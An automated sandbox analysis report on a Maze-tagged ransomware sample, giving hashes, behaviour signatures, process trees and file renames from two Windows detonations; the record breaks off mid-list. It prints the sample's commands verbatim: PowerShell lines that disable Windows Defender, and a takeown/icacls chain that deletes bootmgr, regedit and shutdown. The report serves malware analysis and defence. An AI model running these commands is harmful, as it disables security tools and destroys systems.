Malware Analysis Report

2024-09-22 14:38

Sample ID 220920-fppw6scac9
Target UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
SHA256 ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1
Tags
maze discovery evasion exploit ransomware themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1

Threat Level: Known bad

The file UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe was found to be: Known bad.

Malicious Activity Summary

maze discovery evasion exploit ransomware themida trojan

Maze

Contains code to disable Windows Defender

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Possible privilege escalation attempt

Executes dropped EXE

Disables Task Manager via registry modification

Modifies extensions of user files

Checks BIOS information in registry

Modifies file permissions

Themida packer

Checks computer location settings

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2022-09-20 05:03

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-20 05:03

Reported

2022-09-20 05:08

Platform

win7-20220812-en

Max time kernel

139s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Maze

trojan ransomware maze

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Disables Task Manager via registry modification

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\DisconnectSkip.crw => C:\Users\Admin\Pictures\DisconnectSkip.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
File renamed C:\Users\Admin\Pictures\ResolveUnblock.crw => C:\Users\Admin\Pictures\ResolveUnblock.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1992 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 1992 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 1992 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 1992 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 832 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 772 wrote to memory of 108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 1772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe

"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force

C:\Users\Admin\AppData\Local\Temp\VSSVC.exe

"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32 /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\drivers

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32\drivers /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\LogonUI.exe

Network

N/A

Files

memory/1992-54-0x0000000000EA0000-0x0000000001316000-memory.dmp

memory/1992-55-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

memory/1312-58-0x0000000000000000-mapping.dmp

memory/1476-59-0x0000000000000000-mapping.dmp

memory/1712-57-0x0000000000000000-mapping.dmp

memory/1492-56-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 fb8901bfb5eb8b5cd51c393f6e11ea2e
SHA1 659d7e2e79485eb006372ff061fdffe0961f5e43
SHA256 bfc1cb93abb78c50cf8a280d440551adbfba9ca138be5aa472cbdab95f05f209
SHA512 82e6d79b836fae138c00c47242318b4a8b3c981bc71c431c1bd4062b08287a7a1f7a6667becb58b9ca5525f999efb20e15655f585982748536fb09f5df8c8e49

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 fb8901bfb5eb8b5cd51c393f6e11ea2e
SHA1 659d7e2e79485eb006372ff061fdffe0961f5e43
SHA256 bfc1cb93abb78c50cf8a280d440551adbfba9ca138be5aa472cbdab95f05f209
SHA512 82e6d79b836fae138c00c47242318b4a8b3c981bc71c431c1bd4062b08287a7a1f7a6667becb58b9ca5525f999efb20e15655f585982748536fb09f5df8c8e49

memory/832-68-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\VSSVC.exe

MD5 e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1 b552c6af33cc5a62379028687924406cba8ff74d
SHA256 5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512 ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00

memory/832-70-0x0000000000280000-0x0000000000AF4000-memory.dmp

memory/832-71-0x0000000075281000-0x0000000075283000-memory.dmp

memory/832-72-0x0000000000280000-0x0000000000AF4000-memory.dmp

memory/832-76-0x00000000770A0000-0x0000000077220000-memory.dmp

memory/1712-64-0x000007FEEC170000-0x000007FEECB93000-memory.dmp

memory/1476-77-0x000007FEEC170000-0x000007FEECB93000-memory.dmp

memory/1312-73-0x000007FEEC170000-0x000007FEECB93000-memory.dmp

memory/1492-66-0x000007FEEC170000-0x000007FEECB93000-memory.dmp

memory/1476-82-0x0000000002864000-0x0000000002867000-memory.dmp

memory/1712-84-0x0000000002684000-0x0000000002687000-memory.dmp

memory/1492-83-0x00000000024B4000-0x00000000024B7000-memory.dmp

memory/1312-85-0x0000000002534000-0x0000000002537000-memory.dmp

memory/832-86-0x0000000000280000-0x0000000000AF4000-memory.dmp

memory/832-87-0x0000000000280000-0x0000000000AF4000-memory.dmp

memory/1492-79-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

memory/1712-80-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

memory/1312-81-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

memory/1476-78-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

memory/1492-88-0x000000001B740000-0x000000001BA3F000-memory.dmp

memory/1312-91-0x000000001B950000-0x000000001BC4F000-memory.dmp

memory/1712-90-0x000000001B840000-0x000000001BB3F000-memory.dmp

memory/1476-89-0x000000001B860000-0x000000001BB5F000-memory.dmp

memory/1312-92-0x000000000253B000-0x000000000255A000-memory.dmp

memory/1492-93-0x00000000024BB000-0x00000000024DA000-memory.dmp

memory/1476-94-0x000000000286B000-0x000000000288A000-memory.dmp

memory/1476-97-0x000000000286B000-0x000000000288A000-memory.dmp

memory/1476-96-0x0000000002864000-0x0000000002867000-memory.dmp

memory/1712-95-0x000000000268B000-0x00000000026AA000-memory.dmp

memory/1312-98-0x0000000002534000-0x0000000002537000-memory.dmp

memory/1712-100-0x0000000002684000-0x0000000002687000-memory.dmp

memory/1712-101-0x000000000268B000-0x00000000026AA000-memory.dmp

memory/1312-99-0x000000000253B000-0x000000000255A000-memory.dmp

memory/1492-102-0x00000000024B4000-0x00000000024B7000-memory.dmp

memory/1492-103-0x00000000024BB000-0x00000000024DA000-memory.dmp

memory/772-104-0x0000000000000000-mapping.dmp

memory/108-105-0x0000000000000000-mapping.dmp

memory/540-106-0x0000000000000000-mapping.dmp

memory/1772-107-0x0000000000000000-mapping.dmp

memory/1408-108-0x0000000000000000-mapping.dmp

memory/1796-109-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-09-20 05:03

Reported

2022-09-20 05:08

Platform

win10v2004-20220812-en

Max time kernel

173s

Max time network

195s

Command Line

"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Maze

trojan ransomware maze

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Disables Task Manager via registry modification

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\CloseMove.png => C:\Users\Admin\Pictures\CloseMove.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
File renamed C:\Users\Admin\Pictures\JoinAssert.crw => C:\Users\Admin\Pictures\JoinAssert.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
File renamed C:\Users\Admin\Pictures\OutRedo.png => C:\Users\Admin\Pictures\OutRedo.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
File renamed C:\Users\Admin\Pictures\RevokeProtect.png => C:\Users\Admin\Pictures\RevokeProtect.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
File renamed C:\Users\Admin\Pictures\SendTrace.png => C:\Users\Admin\Pictures\SendTrace.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
File renamed C:\Users\Admin\Pictures\SetDisconnect.png => C:\Users\Admin\Pictures\SetDisconnect.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3176 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 3176 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 3176 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 4664 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 4664 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 4664 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 4324 wrote to memory of 2888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 2888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 2888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 2184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 2184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 2184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe

"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

